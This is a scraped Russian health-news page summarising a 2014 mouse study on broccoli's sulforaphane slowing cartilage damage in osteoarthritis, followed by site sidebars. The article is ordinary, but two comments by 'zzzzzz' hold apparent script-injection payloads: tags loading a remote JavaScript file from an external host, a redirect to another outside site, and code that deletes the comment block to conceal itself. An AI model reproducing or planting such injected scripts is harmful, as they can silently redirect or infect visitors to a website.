Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Похоже, брокколи скоро за...  >>  Похоже, брокколи скоро заменит все! Оказывается и против боли в суставах она помогает!
 
Обратная связь
 

Похоже, брокколи скоро заменит все! Оказывается и против боли в суставах она помогает!

Размер шрифта
04 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Чудо-капуста брокколи не перестает демонстрировать миру все новые и новые полезные свойства. На сей раз ученые из Англии выяснили, что этот замечательный продукт замедляет скорость развития одного из самых распространенных заболеваний суставов.

Исследователи обнаружили, что сульфорафан, содержащийся в брокколи, замедляет разрушение суставного хряща – процесс, ассоциированный с выраженным болевым синдромом и повышенной инвалидизацией. Эффект проявился на лабораторных мышах.

Сульфорафан в немалых количествах содержится в растениях семейства крестоцветные: в брюссельской и белокачанной капусте, но особенно – в брокколи. Ранее ученые выяснили, что это вещество также обладает противоопухолевым и противовоспалительным эффектами, однако его влияние на хрящевую ткань сустава изучалось впервые.

Этот вопрос интересовал ученых в контексте профилактики остеоартроза – дегенеративного заболевания суставов (в первую очередь – коленных и тазобедренных), которое ежегодно превращает миллионы людей в инвалидов и наносит многомиллиардный ущерб экономике.

Пожилой возраст и ожирение – два важнейших фактора, способствующих развитию остеоартроза. По статистике, в Великобритании каждый пятый человек после 45 лет сталкивается с этим заболеванием. К сожалению, эффективного фармакологического лечения остеоартроза не существует, и по сути единственный рабочий вариант в арсенале врачей – замена пораженного сустава на искусственный.

Но вернемся к брокколи. В данный момент ученые из Медицинской школы Норвича проводят небольшое исследование на людях, которых ожидает трансплантация сустава вследствие остеоартроза. Они хотят выяснить, влияет ли как-нибудь брокколи на интенсивность патологического процесса и можно ли экстраполировать на человеческий организм данные, полученные в эксперименте с животными. В случае успеха, эта работа может лечь в основу дальнейших, более масштабных исследований в этой сфере.

«Текущие результаты нашей работы являются очень многообещающими», – рассказывает Иэн Кларк, специалист в области опорно-двигательного аппарата, один из ведущих авторов исследования. «Мы обнаружили позитивный эффект на трех экспериментальных моделях: культура клеток, хрящевая ткань и организм мыши. Теперь мы жаждем узнать, работает ли это на людях – как с точки зрения вспомогательного лечения, так и с точки зрения профилактики».

«Конечно, трансплантация сустава – очень успешная операция, но все-таки, это отнюдь не идеальная опция», – продолжает он. «Важно как можно дольше сохранять функцию своего собственного сустава. Образ жизни и диета – важнейшие составляющие эффективной профилактики остеоартроза. В этом и заключается основной смысл нашего исследования – мы углубляем понимание профилактического питания, чтобы в итоге четко сформулировать пациенту – ешьте это и это, и ваши суставы будут здоровы».

Что ж, будем с нетерпением ждать результатов этого исследования. И каковы бы они ни оказались в итоге, брокколи мы любить не перестанем. Ведь это на самом деле чудо-капуста, настоящий подарок для вашего здоровья.

Результаты данной научной работы были опубликованы в журнале Arthritis & Rheumatism.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда для беременной   Популярный БАД не помогает вашим коленям   Сходите в суши ресторан! Имбирь защищает от рака   Сохранять молодость – значит делать выбор в пользу здорового питания  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Лучшая еда для женщин. Часть 2
Еда против рака. Часть 2
Какие продукты нельзя есть с лекарствами

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.